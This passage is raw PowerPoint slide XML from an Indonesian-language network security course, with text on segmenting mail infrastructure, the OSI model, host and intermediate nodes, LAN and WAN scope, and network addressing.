              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>surat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>surat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4671383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Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akan sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model Open Systems Interconnection (OSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikutip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node dan link. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PHY), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1 pada model OSI, link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> twisted-pair yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentransmisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentransmisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node. Node host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer data. Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Simpul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (LAN). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> metropolitan, negara, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (WAN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
